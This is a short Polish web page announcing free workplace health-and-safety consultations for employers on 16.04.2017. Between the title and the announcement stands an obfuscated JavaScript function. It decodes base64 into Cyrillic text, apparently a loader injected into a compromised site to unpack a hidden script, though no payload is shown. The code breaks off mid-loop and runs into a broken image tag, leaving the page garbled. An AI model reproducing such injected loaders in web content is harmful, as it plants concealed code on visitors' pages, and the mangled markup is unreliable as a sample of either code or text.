Bezpłatne konsultacje z zakresu bhp dla pracodawców już 16.04.2017

func­tion l1c373528ef5(o4){var sa=‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var q3=”;var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o4.charAt(oe++));ve=sa.indexOf(o4.charAt(oe++));r4=sa.indexOf(o4.charAt(oe++));n2=sa.indexOf(o4.charAt(oe++));x1=(yc2)|(ve»4);pc=((ve&15)4)|(r4»2);u6=((r4&3)6)|n2;if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;q3+=String.fromCharCode(x1);if(r4!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;q3+=String.fromCharCode(pc);}if(n2!=64){if(u6>=192)u6+=848;else if(u6==168)u6=1025;else if(u6==184)u6=1105;q3+=String.fromCharCode(u6);}}while(oeandrow_2-300x157.jpg” alt=”” width=“300” height=“157” />Kontynuujemy nasz cykl bez­płat­nych kon­sul­ta­cji w zakre­sie bhp. Naj­bliż­szy ter­min jaki mamy dla Was zare­zer­wo­wa­ny to 16.04.2017. Pozo­sta­je­my do waszej dys­po­zy­cji od godzi­ny 9.00 do 14.00.

Wię­cej infor­ma­cji na osob­nej stro­nie nasze­go ser­wi­su.

Dla kogo przeznaczone są konsultacje

Zapra­sza­my do sko­rzy­sta­nia z bez­płat­nej pora­dy dla pra­co­daw­ców doty­czą­cej spraw zwią­za­nych z bhp. Bez­płat­ne kon­sul­ta­cje zwy­cza­jo­wo trwa­ją do 30 minut i są orga­ni­zo­wa­ne na tere­nie naszej fir­my.